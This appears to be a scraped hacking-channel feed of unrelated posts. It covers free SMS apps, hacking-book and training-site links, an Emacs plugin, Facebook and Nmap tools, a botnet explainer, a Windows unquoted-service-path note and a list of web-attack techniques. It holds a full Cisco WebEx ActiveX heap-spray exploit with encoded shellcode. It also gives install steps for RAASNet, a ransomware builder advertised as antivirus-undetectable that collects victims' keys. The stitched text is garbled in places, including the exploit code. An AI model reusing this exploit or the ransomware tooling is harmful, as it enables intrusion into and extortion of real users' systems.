Detailed fresh Proxies List

https://pastebin.com/L2iwzfyx

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME FREE SMS APPLICATIONS :

http://www.chompsms.com/

https://play.google.com/store/apps/details?id=com.jb.gosms

http://www.handcent.com/

https://mightytext.net/

http://www.mysms.com/

https://play.google.com/store/apps/details?id=com.moez.QKSMS

http://www.textra.me/

textnow.com & textplus & nextplus...by watch videos..

verified from 1 month
@undercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

NEW PRODUCT FROM FACEBOOK !
#Technologies
_

High-Severity Vulnerabilities in WooCommerce
#Vulnerabilities
_

🦑PRACTICAL HACKING BOOK, NEW COLLECTION:

https://github.com/InspectorDidi/Hacking-Books

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#Web Hacking new

[Hack This Site!](https://www.hackthissite.org/) - a free, safe and legal training ground for hackers to test and expand their hacking skills

[Hack The Box](https://www.hackthebox.eu) - a free site to perform pentesting in a variety of different systems.

[Webhacking.kr](http://webhacking.kr/)

[0xf.at](https://0xf.at/) - a website without logins or ads where you can solve password-riddles (so called hackits).

[Gruyere](https://google-gruyere.appspot.com/)

[Others](https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps)

https://github.com/Manisso/fsociety

https://github.com/sundowndev/hacker-roadmap

https://github.com/infoslack/awesome-web-hacking

https://github.com/LyleMi/Learn-Web-Hacking

https://github.com/nil0x42/phpsploit

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑RANSOMWARES Sources:

Excellent CryptoWall 3.0 Writeup: http://blog.brillantit.com/?p=15

CryptoWall 3.0 Writeup: http://www.sentinelone.com/blog/anatomy-of-cryptowall-3-0-a-look-inside-ransomwares-tactics/

Chimera Ransomware: https://threatpost.com/chimera-ransomware-promises-to-publish-encrypted-data-online/115293/

CryptoWall message text used came from https://www.pcrisk.com/removal-guides/7844-cryptowall-virus

CryptoWall 4.0: http://securityaffairs.co/wordpress/41718/cyber-crime/cryptowall-4-0-released.html

CryptoWall 4.0 DECRYPT.html: http://www.bleepstatic.com/images/news/ransomware/cryptowall/v4/note-part-1.jpg

Talos CryptoWall 4.0 Report: http://blog.talosintel.com/2015/12/cryptowall-4.html

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automate your work : Evil operator for evaluating codes, translating text,
taking notes, searching via google, etc.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/Dewdrops/evil-extra-operator.git

2) cd evil-extra-operator

3) ;; change default key bindings (if you want) HERE
;; (setq evil-extra-operator-eval-key (kbd "ge"))
(require 'evil-extra-operator)
(global-evil-extra-operator-mode 1)

4) The key binding customization must be placed BEFORE (require 'evil-extra-operator).

5) Or you can just choose what commands you need and bind them yourself:

6) (require 'evil-extra-operator)
(define-key evil-motion-state-map "gr" 'evil-operator-eval)
(define-key evil-motion-state-map "g'" 'evil-operator-google-translate)

Commands and default bindings

1) gr (evil-operator-eval)

Operator for evaluating code, i.e., use grip to evaluate current paragraph, grr to evaluate current line, or if you are in visual state, gr to evaluate current active region. You can customize option evil-extra-operator-eval-modes-alist to let evil-operator-eval support more language. Example:

(setq evil-extra-operator-eval-modes-alist
'((ruby-mode ruby-send-region)
(enh-ruby-mode ruby-send-region)))

2) gG (evil-operator-google-search)

Operator to search the web via google.

g. (evil-operator-google-translate)

3) Operator to translate text via google translate. To use this command, you should have google-translate installed.

gh (evil-operator-highlight)

4) Operator to highlight region. To use this command, you should have highlight.el installed. You can use hlt-eraser-mouse or hlt-eraser which are provided by highlight.el to erase highlighted area.

gs (evil-operator-fold)

5) Operator to fold region. To use this command, you should have fold-this.el installed. You can use fold-this-unfold-at-point or fold-this-unfold-all which are provided by fold-this.el for unfolding.

go (evil-operator-org-capture)

6) Operator form of org-capture. So you can use goip to capture current paragraph.

gR (evil-operator-remember)

7) Like evil-operator-org-capture, but use remember-region instead of org-capture.

No default binding (evil-operator-query-replace)

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FACEBOOK PENTESTING :

The New version OFFICIAL FBHT V3

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) download or clone

https://github.com/chinoogawa/fbht/archive/V3.0.zip

https://github.com/chinoogawa/fbht/archive/V3.0.tar.gz

2) fbht$:- python setup.py

/usr/lib/python2.7/distutils/dist.py:267

3) usage: setup.py [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]
or: setup.py --help [cmd1 cmd2 ...]
or: setup.py --help-commands
or: setup.py cmd --help

R E Q U I R E M E N T S :

Selenium

Matplotlib-1.2.1

Networkx-1.8.1

Numpy-1.7.1

Pygraphviz-1.1

Simplejson-3.3.0

Mechanize-0.2.5

Other: gephi-0.8.2-beta (Graphs software)

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NUCLEAR RANSOMWARE :)new update/more features
F E A T U R E S :

Generate a ransomware payload
With or without GUI payload

FUD (Fully Undetectable by Anti-Virus)

Works on Windows, MacOS and Linux

Super fast encryption with PyCrypto

Compile to EXE, APP or Unix/Linux executable

Custom icon for your EXE payload

Receive keys of victims

Decrypt files

Demo mode (payload won't encrypt anything)

Fullscreen mode (Warning takes over the screen)

Custom warning message for your victim

Custom image in your payload

Ghost mode (Rename by adding .DEMON extention instead
of encrypting the files)

Multiple encryption methods

Select file extentions to target

Decide if payload should self-destruct (Console mode feature
only)

Decide wich drive to target for encryption (working directory)

Verified server access through port forwarding VPN

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/leonv024/RAASNet.git

2) pip3 install -r requirements.txt

3) python3 RAASNet.py


On Linux, you might need to install these packages:

4) sudo apt install python3-tk python3-pil python3-pil.imagetk

5) Testing connection with remote server:

6) Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989

7) python3 test_socket.py

8)video https://github.com/leonv024/RAASNet/blob/master/demo/PyCrypto-vs-PyAES_demo_10fps.gif

U S E F O R L E A R N
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Exploiting Port 22 SSH Bruteforce Port 22 SSH (RSA Method)

Exploiting port 23 TELNET (Credential Capture) Exploiting

TELNET (Bruteforce) Port 25 SMTP User Enumeration

Exploiting Port 80 (PHP) Exploiting Port 139 & 445 (Samba)

Exploiting Port 8080 (Java) Exploiting Port 5432 (Postgres)

Exploiting Port 6667 (UnrealIRCD) Exploiting Port 36255

Remote Login Exploitation Remote Shell Exploitation

Exploiting Port 8787 Bindshell Exploiting Port 5900 (VNC)

Access Port 2121 (ProFTPD) Exploiting Port 8180 (Apache

Tomcat) Privilege Escalation via NFS Exploiting Port 3306 (MYSQL)

Network Scan Exploiting Port 21 FTP (Hydra) Exploiting VSFTPD 2.3.4

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit :

<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BOTNET FOR BEGINERS :


A) What is a botnet?
A trash can with fill sensors, a video surveillance system with a recording function, a smart TV Box - all these devices connect IoT technologies. All devices are connected to the network, so data transfer is carried out without human intervention.

> A botnet is a chain of many devices connected to the Internet. Thus, hackers infect each device with malware, which allows them to maintain complete control over them.

> Cybercriminals use botnets to target Internet sites. Using a botnet, cybercriminals can steal people's data or gain unauthorized access. The most common use of botnets is through DDoS attacks.

B) Cyber ​​attacks: how to launch them via botnets?
The launch scheme is similar to a regular DDoS attack. However, hackers do not infect users' computers, but their IoT devices. Most modern devices have at least some vulnerabilities, for example, when the owners do not change the default password. Cybercriminals simply connect to poorly secured devices and create a botnet. Thus, the owners of botnets have access to several thousand devices simultaneously, which enables them to conduct cyber attacks.

C) The most famous attacks through botnets
Many cyberattacks have made history, and among them there are several interventions through botnets. The first largest botnet was Mirai. Cybersecurity experts discovered it in September 2016. The initial reason for the infection of gadgets was the default passwords set by manufacturers on the devices they produced. Brian Krebs' website was the first victim of the attack. Brian Krebs is a journalist who previously wrote about botnets. Then the cybercriminals chose the DNS operator American Dyn as the next target. The world's largest websites stopped working due to this interference (you can read more about this in this article). Also, using Mirai, hackers attacked the European host OVH. Further device infections are estimated that the original botnet infected nearly half a million IoT devices.

D) Another botnet was Reaper, also known as IoTroop. It was first used for attacks in the fall of 2017. Devices were hacked very quickly, even faster than it was with Mirai. Not only poorly protected devices with default passwords are infected, but also devices from well-known manufacturers (for example, D-Link). Subsequently, the botnet was used by cybercriminals who directed the attack on large European banks.

E) How many devices do you need for a DDoS attack?
For a successful cyber attack, tens of thousands of devices must be connected. The specific number of bots will vary depending on the cybercrime ability to infect unprotected devices.

Akamai gives interesting statistics. So, in 2016, several customers of the company suffered from a cyber attack from 13 thousand devices. It was enough to send almost 270 thousand requests per hour. In a DDoS attack in 2017, hackers attacked one of Akamai's customers via a network of more than 75,000 bots.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A) Why is it difficult to prevent a botnet cyber attack on your own?

Botnet attacks are a hot topic for cybersecurity professionals. They have been actively discussed in recent years as the number of IoT devices is growing exponentially. Since botnets are difficult to fight, preventive measures need to be taken to protect them while manufacturers and authorized companies try to deal with the problem.

B) Selling vulnerable devices
Imagine an ordinary person who wants to buy a smart robot vacuum cleaner that can be turned on while sitting in the office. Security is the last thing that man or woman will care about (he / she may not even ask any security questions or ask one or two). Buyers are interested in the functionality of the gadget, its power, manufacturer status and, of course, price. A person is more likely to choose a cheaper device, ignoring possible vulnerabilities.

C) IoT gadget manufacturers don't always focus on security. Any oversight in the software development process can lead to the creation of botnets and cyber attacks. Such products will always be in demand due to the low price, so it is impossible to get rid of this problem on your own.

D) Tracking traffic is difficult or impossible
If the attack is large (as was the case with the previously described Mirai or Reaper botnets), the flow of requests is easy to spot and block. However, they are often used for smaller crimes like sending spam . In this case, the ISPs simply ignore it. It also comes with the difficulty of tracking traffic.

E) Infected devices are difficult to detect
It is worth noting that some organizations control the vulnerability of gadgets. Companies like CrowdStrike report infected devices to ISPs in different countries. They can contact the owners of the infected devices and report the problem. But, as mentioned earlier, there are billions of IoT devices out there. And millions of them could be on the botnet chain. It is almost impossible to control the spread of infected gadgets.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

In Windows environments when a service is started the system is attempting to find the location of the executable in order to successfully launch the service. If the executable is enclosed in quote tags “” then the system will know where to find it. However if the path of where the application binary is located doesn’t contain any quotes then Windows will try to find it and execute it inside every folder of this path until they reach the executable.
This can be abused in order to elevate privileges if the service is running under SYSTEM privileges.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Hacking

simple CLI with the ability to run pure Nmap engine

predefined scans included in the modules

support Nmap Scripting Engine (NSE) with scripts arguments

TOR support (with proxychains)

multiple scans at one time

at this point: 31 modules with 459 scan profiles

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) Clone this repository
git clone --recursive https://github.com/trimstray/sandmap

2) Go into the repository
cd sandmap

3) Install
./setup.sh install

4) Run the app
sandmap

🦑The etc/main.cfg configuration file has the following structure:

# shellcheck shell=bash

# Specifies the default destination.
# Examples:
# - dest="127.0.0.1,8.8.8.8"
dest="127.0.0.1"

# Specifies the extended Nmap parameters.
# Examples:
# - params="--script ssl-ccs-injection -p 443"
params=""

# Specifies the default output type and path.
# Examples:
# - report="xml"
report=""

# Specifies the TOR connection.
# Examples:
# - tor="true"
tor=""

# Specifies the terminal type.
# Examples:
# - terminal="internal"
terminal="internal"

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑Website Hacking – The Most Common Techniques

SQL Injection attacks. SQL Injection attack is the most
common website hacking technique.

Cross Site Scripting (XSS)

Denial of Service (DoS/DDoS)

Cross-site request forgery (CSRF or XSRF)

DNS Spoofing (DNS cache poisoning)

Social engineering techniques.

Non-targeted website hacking.

#fastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁